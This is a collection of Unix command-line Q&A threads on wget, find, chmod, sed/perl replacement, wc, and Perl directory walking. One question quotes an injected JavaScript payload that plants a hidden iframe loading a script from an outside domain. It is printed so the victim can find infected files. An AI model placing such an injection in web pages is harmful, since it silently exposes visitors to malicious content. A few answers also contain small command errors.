I want to do a recursive download and store it in one folder but avoid the files with queries; Home?query – in this case Home. For this I've tried --reject with a pattern but I can't make it work.
I can avoid extension .1,.2,... .n if I add a long list of numbers, but there is hopefully a better way.
This is the wget:
wget \
--page-requisites \
--no-parent \
--no-host-directories \
--no-directories \
--convert-links \
--load-cookies wget_cookies.txt --cookies=on --keep-session-cookies \
-P WikiFolders/pages/ \
-e robots=off \
-r \
--reject='1,2,3,4,5,6,7,8,9,*\\?*' \
--content-disposition \
--no-check-certificate \
http://domain/wiki/Section/
If I run it this way I do get the site but is really slow for some content.
Note: to avoid files with queries I tried *\\?* but this doesn't work.
After I download I remove the content with:
find WikiFolders/pages/ -iname "*\\?*" -delete
but again this is really slow and I have to download lots of content.
I've thought on first exclude the HTML and download images, CSS and js and with other wget the HTML but since the files have no extension this doesn't work.
|
You can use the [] notation to specify ranges of numbers and letters. Repeat for multiple.
*[0-9],*[0-9][0-9],*[0-9][0-9][0-9]
|____||__________||_______________|
| | |
| | +---------- Reject ending with 000 to 999
| +------------------------- Reject ending with 00 to 99
+--------------------------------- Reject ending with 0 to 9
This can also be used with --accept.
For the query links there is no way to filter it out – however if you specify
*\?* the files will be deleted after they have been downloaded. So you would have to live with it using bandwidth and time for downloading, but you do not have to do a cleanup afterwards.
So, summa summarum, perhaps something like this:
--reject='*.[0-9],*.[0-9][0-9],*\?*'
If this does not suffice you would have to look into other tools like the one mentioned in possible duplicate link under your question.
| wget recursive with files without extension |
1,322,691,968,000 |
I'm migrating a directory of files containing fairly simple ASP code over to a PHP server and I need to modify the contents of all the files with a find and replace mechanism. I'm not great with regular expressions, but I've used this to change a few things already:
find . -name "*.php" -print0 | xargs -0 -n 1 sed -i -e 's/oldstring/newstring/g'
I have some complex strings I need to replace though. See the following:
FROM:
<% if request("page") = "" then %>
TO:
<?php if(!isset($_GET['page']) || !$_GET['page']){ ?>
This one, the * can be any number, then keep that number where the * is on the
"TO".
FROM:
<% elseif request("page") = "*" then %>
TO:
<?php } elseif($_GET['page'] == '*'){ ?>
And the last one is pretty simple.
FROM:
<% end if %>
TO:
<?php } ?>
If I can run this in bulk, recursively in a directory, this will fix 98% of all the ASP code in these files. I've tried to escape these strings in several ways, but cannot figure out how to get it to run. Any help is appreciated!
|
There are various ways of doing this, I would recommend taking advantage of Perl's quotemeta function.
First, make a tab separated text file containing the search patterns in the first column and their replacement in the second:
$ cat pats.txt
<% if request("page") = "" then %> <?php if(!isset($_GET['page']) || !$_GET['page']){ ?>
<% elseif request("page") = "*" then %> <?php } elseif($_GET['page'] == '*'){ ?>
<% end if %> <?php } ?>
I created a test file whose contents are:
$ cat foo.asp
<% if request("page") = "" then %>
<% elseif request("page") = "*" then %>
<% end if %>
And Perl to the rescue:
find . -name "*.php" | while IFS= read -r file; do
perl -i.bak -e 'open(A,"pats.txt");
while(<A>){chomp; @a=split(/\t/); $k{quotemeta($a[0])}=$a[1]}
while(<>){
foreach $pat (keys(%k)){
s/$pat/$k{$pat}/;
}
print}' $file;
done
Perl's -i flag works just like in sed, you can specify an optional backup suffix. In the example above, a file called foo.php.bak will be created for each processed file. Use -i alone if you don't want the backups.
EXPLANATION:
The script will read the patterns and replacements and save the patterns as keys of a hash (%k) where the replacements are the values. The quotemeta function escapes all non ASCII (not matching [A-Za-z_0-9]) characters.
The script them opens the second file, looks for each pattern in each line and replaces accordingly. Since the search patterns has been escaped by quotemeta it is correctly recognized.
NOTES
This is obviously not the most efficient way of doing this since it will have to look for each of the patterns on each line. Still, it works and is much simpler than mucking about trying to manually escape everything.
The script will fail for files with new lines in the names. I assume that won't be a problem here.
| Change some ASP code to PHP code in all files |
1,322,691,968,000 |
I need to recursively iterate through all the subdirectories of a folder.
Within the subdirectories, if there's a file with an extension '.xyz' then I need to run a specific command in that folder once.
Here's what I have so far
recursive() {
for d in *; do
if [ -d "$d" ]; then
(cd -- "$d" && recursive)
fi
dir=`pwd`
pattern="*.xyz"
file_count=$(find $dir -name $pattern | wc -l)
if [[ $file_count -gt 0 ]]; then
echo "Match found. Going to execute a command"
#execute command
fi
done
}
(cd /target; recursive)
But the problem is that the "Match found.." message is displayed more than once per folder when there's a match. Is there a simpler way to do this while fixing this problem?
|
find has a builtin flag to print strings, which is pretty useful here:
find -iname "*.xyz" -printf "%h\n" prints the names of all directories that contain a file that matches your pattern (the %h is just find's magic syntax that expands to the file directory and \n is, of course, a linebreak).
Therefore, this does what you want:
COMMAND='echo'
find `pwd` -iname "*.pdf" -printf "%h\n" | sort -u | while read i; do
cd "$i" && pwd && $COMMAND
done
There are a few things that are going on here. To execute commands only once, we just pipe it through sort with the -u flag, which drops all duplicate entries. Then we loop over everything with while. Also note that I used find `pwd`, which is a nice trick to make find output absolute paths, instead of relative ones, which allows us to use cd without having to worry about any relative paths.
Edit: Be careful with your directory names when executing this script, as directory names containing a newline (\n) or even just \ can break the script (maybe other uncommon characters too, but I haven't tested any more than that). Fixing this is hard and I don't know how to do it, so I can only suggest not using such directories.
| Recursively iterate through all subdirectories, If a file with a specific extension exists then run a command in that folder once |
1,322,691,968,000 |
I use this commandline to convert jpegs to pdfs inside a folder.
for f in *.jpg; do echo "Converting $f"; convert "$f" "$(basename "$f" .jpg).pdf"; done
However, I would like to convert all .jpg from several folders to .pdf located inside the samefolder. I need a bash command which says "go inside folder A, launch the conversion to pdf and when it is done, go to folder B and do the same".
Also jpeg file could be ended by .jpg or .JPG.
My folder structure is such as:
Folder A
File1.jpg
File1.jpg
File1.jpg
File1.jpg
File1.jpg
Folder B
File1.jpg
File1.jpg
File1.jpg
...
Any idea about how to achieve this?
|
Updated to allow file names *.jpg and *.JPG according to updated question:
Use -iname for case insensitive comparison, and variable expansion with pattern ${file%.[jJ][pP][gG]}. This will actually match .jpg in any capitalization, e.g. .JpG.
Assuming Folder A and Folder B are in the current directory and you want to do the same in all directories recursively:
find . -type f -iname \*.jpg | while read -r file
do
echo "Converting $file"
convert "$file" " ${file%.[jJ][pP][gG]}.pdf"
done
Or if you want to specify the directory names
find "Folder A" "Folder B" type f -iname \*.jpg | ...
If you don't have any subdirectories named *.jpg you can leave out the -type f.
If you don't want to do the conversion recursively in subdirectories of Folder A etc. you might have to add a -maxdepth condition.
| Recursive conversion of jpeg files |
1,322,691,968,000 |
I am experiencing an issue with a indexing program running much longer than expected. I want to rule out the possibility of a recursive symbolic link. How could I find a symbolic link that is recursive at some level?
|
This related question, provides a way to identify a recursive symbolic link using the find command:
$ find -L .
.
./a
./a/b
./a/b/c
./a/b/c/d
find: File system loop detected; `./a/b/c/d/e' is part of the same file system loop as `./a/b'.
find: `./a/b/e': Too many levels of symbolic links
| How could I quickly find a recursive symbolic link? [duplicate] |
1,322,691,968,000 |
I am using the following Linux command to recursively count lines of text files in a folders structure:
find . -name '*.txt' | xargs -d '\n' wc -l
This outputs all found files and their number of lines:
86 ./folder1/folder11/folder111/file1.txt
67 ./folder1/folder11/folder112/file2.txt
7665 ./folder1/folder11/folder113/file3.txt
..., etc.
1738958 total
There are a total of 24k+ files. The number of lines for each file are correct and all files there are possessed. But the total number of lines is not correct.
Even for a sub-folder of this structure the total number of lines is much bigger. For example:
cd folder1/folder11
find . -name '*.txt' | xargs -d '\n' wc -l
gives at the end 23M lines:
22535346 total
The total number of all lines should be > 100M, not 1.7M. What I am missing here?
|
If you have GNU wc, use
find . -name "*.txt" -print0 | wc -l --files0-from -
The manual section for this option explains why what you were doing doesn't work:
‘--files0-from=file’
Disallow processing files named on the command line, and instead process those named in file file; each name being terminated by a zero byte (ASCII NUL). This is useful when the list of file names is so long that it may exceed a command line length limitation. In such cases, running wc via xargs is undesirable because it splits the list into pieces and makes wc print a total for each sublist rather than for the entire list. One way to produce a list of ASCII NUL terminated file names is with GNU find, using its -print0 predicate. If file is ‘-’ then the ASCII NUL terminated file names are read from standard input.
If your wc doesn't support this option, you could instead send the output through a simple script to extract all the "total" lines and add them up.
... | awk '$2=="total"{t=t+$1} END{print t " total"}'
| Wrong result when recursively count lines with wc |
1,322,691,968,000 |
I am currently trying to set all files with extensions .html in the current directory and all its subdirectories to be readable and writeable, and executable by their owner and only readable (not writeable or executable) by groups and others. However, some of the files have spaces in their name, which I am unsure how to deal with.
My first attempt:
chmod -Rv u+rw,go+r '* *.html'
When I tried my first attempt, I get the following message:
chmod: cannot access '* *.html': No such file or directory
failed to change mode of '* *.html' from 0000 (---------) to 0000 (---------)
My second attempt:
find . -type f -name "* *.html" | chmod -Rv u+rw,go+r
I added a pipe operator in order to send the find command's output to chmod. However, when I tried my second attempt, I get the following:
chmod: missing operand after ‘u+rw,go+r’
After my attempts, I'm still confused on how to deal with spaces in file names in order to change set permissions recursively. What is the best way to deal with this issue? Any feedback or suggestion is appreciated.
|
Use the -exec predicate of find:
find . -name '* *.html' -type f -exec chmod -v u+rw,go+r {} +
(here, adding rw-r--r-- permissions only as it makes little sense to add execute permissions to an html file as those are generally not meant to be executed. Replace + with = to set those permissions exactly instead of adding those bits to the current permissions).
You can also add a ! -perm -u=rw,go=r before the -exec to skip the files which already have (at least) those permissions.
With the sfind implementation of find (which is also the find builtin of the bosh shell), you can use the -chmod predicate followed by -chfile (which applies the changes):
sfind . -name '* *.html' -type f -chmod u+rw,go+r -chfile
(there, no need to add the ! -perm... as sfind's -chfile already skips the files that already have the right permissions).
That one is the most efficient because it doesn't involve executing a separate chmod command in a new process for every so many files but also because it avoids looking up the full path of every file twice (sfind calls the chmod() system call with the paths of the files relative to the directories sfind finds them during crawling, which means chmod() doesn't need to look up all the paths components leading to them again).
With zsh:
chmod -v -- u+rw,go+r **/*' '*.html(D.)
Here using the shell's recursive globbing and the D and . glob qualifiers to respectively include hidden files and restrict to regular files (like -type f does). Add ^f[u+rw,go+r] to also skip files which already have those permissions.
You can't use chmod's -R for that in combination with globs. Globs are expanded by the shell, not matched by chmod, so with chmod -Rv ... *' '*.html (note that those * must be left unquoted for the shell to interpret them as globbing operators), you'd just pass a list of html files to chmod and only if any of those files were directories would chmod recurse into them and change the permissions of all files in there.
| How do I handle file names with spaces when changing permissions for certain files in the current directory and all its subdirectories? |
1,322,691,968,000 |
I am on a system which deletes files which haven't been modified in 30 days. I need some way to preserve important files by marking them as being recently modifed. What is the best way I can do this? Something like for d in *; do; cat $d > $d ; done
|
cd to that directory, then use this command to mark only the files :
find . -type f -exec touch {} \;
or this command to mark even the directories :
find . -exec touch {} \;
After the execution, the files (and folders if you choose the 2nd command) will be marked that they were just changed, and their content won't be changed.
The advantage of this command that it will go recursive, even the subdirectories and the files under those subdirectories will be marked as changed.
| recursively mark all files in a directory as modified without changing file content |
1,322,691,968,000 |
I have the following directory structure in AIX.
codeRepo/REPO1/AREA1/objects
codeRepo/REPO1/AREA2/SUBAREA1/objects
codeRepo/REPO1/AREA2/SUBAREA2/objects
From codeRepo I want to run chown myUser * on each objects directory in the tree. As you can see there are various objects directories sitting in different places.
|
If you want to chown the directories only (and not the subfiles), use find -exec, as like:
find -type d -name objects -exec chown myUser {} \;
Going through this:
-type d selects only directories
-name objects looks only for directories named exactly "objects"
-exec chown myUser {} \; executes chown myUser {} for each path found (with {} replaced by the path)
If you want to also chown all the files inside as well, just replace chown with chown -R.
| Run a command over directories with name recursively |
1,322,691,968,000 |
I wanted to recursively run chmod go+w in a particular folder including hidden files, and I first tried
find . -name ".*" -o -name "*" -exec chmod go+w {} \;
but I found that it wasn't affecting hidden files. To check myself, I ran just
find . -name ".*" -o -name "*"
and the hidden files were listed. I also noticed that if I excluded the -o -name "*" part it would chmod the hidden files (but exclude non-hidden of course). My last attempt was to use xargs instead
find . -name ".*" -o -name "*" | xargs chmod go+w
which finally worked as expected. What am I doing wrong in the first snippet?
Red Hat Enterprise Linux Server release 6.8 (Santiago)
GNU bash, version 4.3.42(1)-release (x86_64-unknown-linux-gnu)
|
The solution is to bind the two name tests together with parens.
To illustrate this, let's consider a directory with three regular files:
$ ls -a
. .. .hidden1 .hidden2 not_hidden
Now, let's the original command:
$ find . -name ".*" -o -name "*" -exec echo Found {} \;
Found ./not_hidden
Only the non-hidden file is found.
Next, let's add parens to group the two name tests together:
$ find . \( -name ".*" -o -name "*" \) -exec echo Found {} \;
Found .
Found ./not_hidden
Found ./.hidden1
Found ./.hidden2
All files are found.
The solution is to use parens.
More details
In the original command, there is not operator between -name "*" and -exec ... \;. Consequently, find assumes the default operator which is logical-and. Because logical-and binds tighter than logical-or (-o), this means that the command is interpreted as:
find . \( -name ".*" \) -o \( -name "*" -exec echo Found {} \; \)
This means that the exec is run only if the first name condition failed to match.
For more information, see the OPERATORS section in man find.
What happens without -exec
Let's try using a simple -print:
$ find . -name ".*" -o -name "*" -print
./not_hidden
As you can see, -print bound to the -name "*" with the implicit logical-and as above.
But, consider what happens without any action specified:
$ find . -name ".*" -o -name "*"
.
./not_hidden
./.hidden1
./.hidden2
Here, all files were found. The reason is that, in this version, -o is the only operator.
| Different behaviors between find -exec and piping through xargs [duplicate] |
1,475,911,180,000 |
I want to run this bash command :
#!/bin/bash
rep="*"
for f in `ls -R`$rep; do
d='git log '$f'| wc -l'
c=$d
echo $c
done
how to excute a command git log myFile | wc -l from bash ?
ps : this command will return a number : git log myFile | wc -l
|
If you want to execute a command and get the output use the line below
d=`git log`
In your script you have to change two two things. I have the correct script below
#!/bin/bash
rep="*"
for f in `ls -R $rep`; do
d=`git log $f| wc -l`
c=$d
echo $c
done
Edit: The original correction is changing the quotes to backticks to make the output reach the d variable.
In addition, the $rep should be inside the backticks with the ls, otherwise it will add the * at the end of the last file name processed.
| Run a command on all the files in a directory tree and put the output into a variable |
1,475,911,180,000 |
How can I do a line count on all the PHP scripts within my webroot?
I am trying something like this below to no avail:
wc -l *.php
|
You need to use either a shell whose wildcard expansion includes subdirectories, or to stack another tool for directory transversal, such as find:
find -name "*.php" | xargs wc -l
If, OTOH, your goal is to sum it all, join the code first:
find -name "*.php" | xargs cat | wc -l
| line count on all the PHP scripts within my webroot with wc |
1,475,911,180,000 |
I have a large n-level directory structured as follows:
root
|
subdir1
|
sub_subdir1
|
....(n-2 levels).....
|
file1
|
subdir2
|
sub_subdir2
|
....(n-2 levels).....
|
file2
I want to flatten the directory so that all level 1 subdirs contain files. I also want to remove the level 2 to (n-1) sub_subdirs as they contain no files. Please note that the subdirs all have different names.
Desired Result
root
|
subdir1
|
file1
|
subdir2
|
file2
I have found a lot of posts explaining methods to flatten directories but none that explains how to do this in a controlled manner, i.e.,
by specifying the levels to be flattened
or doing it recursively for all sub_directories in a root directory
|
Using zsh:
cd /root
for subdir in subdir*
do
mv "$subdir"/**/*(.) "$subdir"
rm -r "$subdir"/*(/)
done
This:
changes to the "/root" directory (from your example)
loops over every subdirectory named subdir* (again from your example: matching subdir1 and subdir1)
moves the (expected one, but would match all) matching file(s) under that subdirectory into that subdirectory. This uses zsh's ** recursive globbing feature, limited then by the glob qualifier *(.) which says: any entry in this directory that's a plain file
after moving the file, recursively remove every subdirectory under that subdirectory; this again uses a zsh glob qualifier *(/) which says to match entries that are directories.
| Recursively flattening subdirectories in a root directory and maintaining level 1 sub-directory structure |
1,475,911,180,000 |
I have the following file structure:
Some directory
Some file.txt
Another file here.log
Yet another file.mp3
Another directory
With some other file.txt
File on root level.txt
Another file on root level.ext
What I want to do now is run a little script that takes another file as input containing some type of pattern/replacement pairs in it to rename these files recursively according to them. So that every "another" (case insensitive) gets replaced with "foo" or every "some" with "bar."
I already tried a lot of things with iterating over files and reading said input file, but nothing worked like it should and I finally managed to accidentally overwrite my testing script. But there were a lot of ls, while, sed or mv in use.
The two things I couldn't resolve myself were how to handle whitespace in filenames and how to not handle files that were already renamed in a previous pattern match.
Maybe you can point me in the right direction?
|
TOP="`pwd -P`" \
find . -type d -exec sh -c '
for d
do
cd "$d" && \
find . ! -name . -prune -type f -exec sh -c '\''
while IFS=\; read -r pat repl
do
rename "s/$pat/$repl/g" "$@"
N=$#
for unmoved
do
if [ -f "$unmoved" ]
then
set X ${1+"$@"} "$unmoved"
shift
fi
done
shift "$N"
case $# in 0 ) break ;; esac
done < patterns.csv
'\'' x \{\} +
cd "$TOP"
done
' x {} +
Set up find to net directories only and have sh down them in a gulp. This minimizes the number of invocations of sh.
Set up find in each of these directories to net regular files, at a depth level of 1 only, and feed them to sh in a gulp. This minimizes the number of times the rename utility gets to be called.
Set up a while loop to read-in the various pattern <-> replacement pairs and apply them on all the regular files.
In the process of rename-ing we keep a note on whether a file was still standing after the rename process. If we find that a file still exists then that means, for some reason, it could not be renamed and hence would be tried in the next pat/repl iteration. OTOH, if the file was successfully renamed, then we DONT apply the next pat/repl iteration on this file by taking it away from the command line arguments list.
| Recursively rename files by using a list of patterns and replacements |
1,475,911,180,000 |
When I do chmod _+x -R /dir where "_" is any combination of (u,g,o,a), if after I do chmod g+X -R /dir, the files gain executable permissions as well.
Why does this happen? This behavior only happens if I use lower "x" first, then use upper "X".
First example:
[root@jesc5161 home]# chmod a-rwx -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
d---------. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
d---------. 2 root root 6 Apr 22 21:41 accounting
----------. 1 user user 0 Apr 22 22:06 myfile1
----------. 1 user finance 0 Apr 22 22:12 myfile2
----------. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod u+x -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
d--x------. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
d--x------. 2 root root 6 Apr 22 21:41 accounting
---x------. 1 user user 0 Apr 22 22:06 myfile1
---x------. 1 user finance 0 Apr 22 22:12 myfile2
---x------. 1 user user 0 Apr 22 22:12 myfile3
Here I only want to give group executable permission, but files also get executable permissions:
[root@jesc5161 home]# chmod g+X -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
d--x--x---. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
d--x--x---. 2 root root 6 Apr 22 21:41 accounting
---x--x---. 1 user user 0 Apr 22 22:06 myfile1
---x--x---. 1 user finance 0 Apr 22 22:12 myfile2
---x--x---. 1 user user 0 Apr 22 22:12 myfile3
Another example:
[root@jesc5161 home]# chmod a-rwx -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
d---------. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
d---------. 2 root root 6 Apr 22 21:41 accounting
----------. 1 user user 0 Apr 22 22:06 myfile1
----------. 1 user finance 0 Apr 22 22:12 myfile2
----------. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod u+rwx -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drwx------. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drwx------. 2 root root 6 Apr 22 21:41 accounting
-rwx------. 1 user user 0 Apr 22 22:06 myfile1
-rwx------. 1 user finance 0 Apr 22 22:12 myfile2
-rwx------. 1 user user 0 Apr 22 22:12 myfile3
Again, I only want to give group executable permission, but files gain executable permissions as well.
[root@jesc5161 home]# chmod g+X -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drwx--x---. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drwx--x---. 2 root root 6 Apr 22 21:41 accounting
-rwx--x---. 1 user user 0 Apr 22 22:06 myfile1
-rwx--x---. 1 user finance 0 Apr 22 22:12 myfile2
-rwx--x---. 1 user user 0 Apr 22 22:12 myfile3
Here is an example where "it works" but as you can see I did NOT use lower "x" prior to using upper "X"
[root@jesc5161 home]# chmod a-rwx -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
d---------. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
d---------. 2 root root 6 Apr 22 21:41 accounting
----------. 1 user user 0 Apr 22 22:06 myfile1
----------. 1 user finance 0 Apr 22 22:12 myfile2
----------. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod a+rw -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drw-rw-rw-. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drw-rw-rw-. 2 root root 6 Apr 22 21:41 accounting
-rw-rw-rw-. 1 user user 0 Apr 22 22:06 myfile1
-rw-rw-rw-. 1 user finance 0 Apr 22 22:12 myfile2
-rw-rw-rw-. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod g+X -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drw-rwxrw-. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drw-rwxrw-. 2 root root 6 Apr 22 21:41 accounting
-rw-rw-rw-. 1 user user 0 Apr 22 22:06 myfile1
-rw-rw-rw-. 1 user finance 0 Apr 22 22:12 myfile2
-rw-rw-rw-. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod o+X -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drw-rwxrwx. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drw-rwxrwx. 2 root root 6 Apr 22 21:41 accounting
-rw-rw-rw-. 1 user user 0 Apr 22 22:06 myfile1
-rw-rw-rw-. 1 user finance 0 Apr 22 22:12 myfile2
-rw-rw-rw-. 1 user user 0 Apr 22 22:12 myfile3
[root@jesc5161 home]# chmod u+X -R finance/
[root@jesc5161 home]# ll
total 4
drwxr-xr-x. 3 root root 17 May 2 2015 ec2-user
drwxrwxrwx. 3 root finance 65 Apr 22 22:12 finance
drwx------. 9 user user 4096 Apr 22 21:28 user
[root@jesc5161 home]# ll finance/
total 0
drwxrwxrwx. 2 root root 6 Apr 22 21:41 accounting
-rw-rw-rw-. 1 user user 0 Apr 22 22:06 myfile1
-rw-rw-rw-. 1 user finance 0 Apr 22 22:12 myfile2
-rw-rw-rw-. 1 user user 0 Apr 22 22:12 myfile3
|
+X means to set the execute bit:
if the file is a directory or if the current (unmodified) file mode bits have at least one of the execute bits (S_IXUSR, S_IXGRP, or S_IXOTH) set. It shall be ignored if the file is not a directory and none of the execute bits are set in the current file mode bits.
Once you've run chmod -R _+x dir, the execute bit is set for at least some of user/group/other for every file (that you have permission to modify). That means -X applies to all of those files as well.
If you only want to affect directories, and there are no other executable files in the tree, you can run the +X command before other modifications. Otherwise, you can use find:
find dir -type d -exec echo chmod g+x {} \+
That finds all directories (-type d) in dir and executes echo chmod g+x on them all, with {} turned into all the paths.
| Why is chmod recursively changing file permissions as well? |
1,475,911,180,000 |
I need to list files in hierarchy of directory. For that I wrote script like
foreach file ( * )
ls ${file}/*/*/*/*/*.root > ${file}.txt
end
But for this I have to know that in the directory ${file} there are 4 directory. So, Is there any way by which I can generalize this script, such that I did not have to be idea how many subdirectories are present?
|
Use the find command.
foreach file ( * )
find ${file} -name "*.root" > ${file}.txt
end
Consider using a shell other than csh, which has been obsolete for about 20 years. Use zsh or bash interactively, and don't use csh for scripts.
| List files in hierarchy of directory |
1,475,911,180,000 |
I have a large directory with tons of files and subdirectories in it. Is there a way to recursively search through all of these files and subdirectories and print out a list of all files containing an underscore (_) in their file name?
|
find . -name '*_*'
Thanks to Stéphane Chazelas as noted in the comments above!
| Recursively list files containing an underscore in the file name |
1,475,911,180,000 |
I am looking for a specific file in OS/X.
I can see the file by using:
ls -alR | grep "mkmf.*"
This shows my that the file exists.
How do I find what directory the file is located.
Many thanks
|
Use find which is better suited for your intended purpose:
find . -name "mkmf*"
It will list all appearances of your pattern including the relative path. For more information look at manual page of find with man find or go to http://www.gnu.org/software/findutils/manual/html_mono/find.html
| How do I find a files directory? |
1,475,911,180,000 |
How do I make the following function work correctly
# Install git on demand
function git()
{
if ! type git &> /dev/null; then sudo $APT install git; fi
git $*;
}
by making git $* call /usr/bin/git instead of the function git()?
|
Like this:
# Install git on demand
function git()
{
if ! type -f git &> /dev/null; then sudo $APT install git; fi
command git "$@";
}
The command built-in suppresses function lookup. I've also changed your $* to "$@" because that'll properly handle arguments that aren't one word (e.g., file names with spaces).
Further, I added the -f argument to type, because otherwise it'll notice the function.
You may want to consider what to do in case of error (e.g., when apt-get install fails).
| Install-on-Demand Wrapper Function for Executables |
1,475,911,180,000 |
I'm using:
grep -n -H -o -R -e textword .
List all file recursively under directory '.' with string 'textword' and show the file, line and only portion matching.
I need to remove lines that matched the text using a Linux command.
|
find . -type f -exec sed -r -i "/textword/d" {} +
Remember that the search text is interpreted as a regexp by sed (with the -r option), so it might need escaping.
Use sed -i.backup to backup original files as <filename>.backup.
| Search and replace full line in recursive files |
1,475,911,180,000 |
One of my website on my webserver has suffered an attack : code injection.
Here is the malicious code :
<script type=\"text/javascript\" language=\"javascript\">
(function () {
var t = document.createElement('iframe');
t.src = 'http://ahtiagge.ru/count27.php';
t.style.position = 'absolute';
t.style.border = '0';
t.style.height = '1px';
t.style.width = '1px';
t.style.left = '1px';
t.style.top = '1px';
if (!document.getElementById('t')) {
document.write('<div id=\'t\'></div>');
document.getElementById('t').appendChild(t);
}
})
();</script>
I want to know the name (and path) of all files coutains the expression on my server to stanch the contagion. Here is the expression i want to match :'http://ahtiagge.ru/count27.php'
I would like results like that :
/var/www/vhosts/site1.com/httpdocs/index.php
/var/www/vhosts/site1.com/httpdocs/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/and_sub/fileN.php
How can I solve this with a shell script ? is it possible ?
|
You can simply use grep for the same
grep -RP "http:\/\/ahtiagge.ru\/count27\.php" /var/www/vhosts/
or only check in *.php files only with the help of find
find /var/www/vhosts/ -name "*.php" -print | xargs grep -P "http:\/\/ahtiagge.ru\/count27\.php"
| find "an expression" on each file of a directory recursively |
1,475,911,180,000 |
Trying to do something like (in pseudo-unix):
scp -r <pwd> [email protected]:~/<dirname of toplevel>
In other words, I'm trying to copy the current directory I'm in locally (and the contents) over to remote while sticking the very last path segment from "pwd" commands output onto /home/user/<here> in the remote.
I'm shaky in my unix commands so I figured I'd ask vs. experiment this time to avoid damage
|
$ scp -pr "$(pwd)" [email protected]:"$(basename $(pwd) )/"
| Use SCP from local machine to recursively copy current working directory to remote? |
1,475,911,180,000 |
I quite like mercurial .hgignore-style pattern globbing.
Globs are rooted at the current directory; a glob such as *.c will only match files in the current directory ending with .c.
The supported glob syntax extensions are ** to match any string across path separators and {a,b} to mean "a or b".
Is there a Linux shell that supports this?
|
All shells will support the standard glob *.c. KSH, Bash, and ZSH support brace expansion ({a,b}), but note that this not a file glob, so it will always expand. ZSH's extended globbing and Bash's globstar (bash v4 or higher), support ** for recursive globbing.
| I quite like mercurial .hgignore-style globbing. Is there a Linux shell that supports it? |
1,475,911,180,000 |
For a Perl script I'm working on, I'm looking for a fast and reliable way to find all subdirectories (transitively) of a given directory which are leaves, i.e. those not having any subdirectories of their own. For example, given this hierarchy:
foo/
foo/bar/
foo/bar/baz
foo/you_fool
my hypothetical function, when called with "foo" as the argument, should return the list ("foo/bar/baz/", "foo/you_fool/").
Because this will clearly require File::Find or something equivalent, and that already does a stat system call for each file it finds, fast means not doing another stat on each file, although one extra stat on each directory, i.e. the value of $File::Find::dir is okay.
Because my main target system is Darwin aka MacOS, I unfortunately cannot use the nlink field of struct stat; it doesn't seem to be meaningful on that file system. I'm aware that on a "real Unix" file system I could just compare nlink to 2 for each directory.
If it matters, we may disregard symlinks, special files and all other oddities; the hierarchies I'll be searching are very clean and regular.
|
You could do something like:
perl -MFile::Find -le '
find(sub {
if (-d _) {
undef $leaves{$File::Find::name};
delete $leaves{$File::Find::dir};
}
}, ".");
print for keys %leaves'
undef sets hash element for the current dir to an undef value, while delete deletes the hash element for the parent directory. So at the end the keys of the %leaves hash contain only the leaves.
With -d _, we're reusing the information from the lstat() that File::Find did on the current file, so no extra lstat() / stat() is performed. With -d alone, an extra stat() (not lstat()) would be performed, which means it would also return true for symlinks to directories.
While it works in my test, it may not be a valid and future-proof thing to do. The documentation says:
[with "follow"] It is guaranteed that an lstat has been called before the
user's "wanted()" function is called. This enables fast file
checks involving "_". Note that this guarantee no longer holds
if follow or follow_fast are not set.
Doing if (! -l && -d _) may be safer, at the expense of an extra lstat() being performed for each file.
| Detect leaf directories in Perl |
1,475,911,180,000 |
Why
I have two folders that should contain the exact same files, however, when I look at the number of files, they are different. I would like to know which files/folders are present in one, not the other. My thinking is I will make a list of all the files and then use comm to find differences between the two folders.
Question
How to make a list recursively of files and folders in the format /path/to/dir and /path/to/dir/file ?
Important notes
OS: Windows 11, subsystem Ubuntu 20.04.4 LTS
Locations folders: One network drive, one local
Size of folders: ~2tb each
|
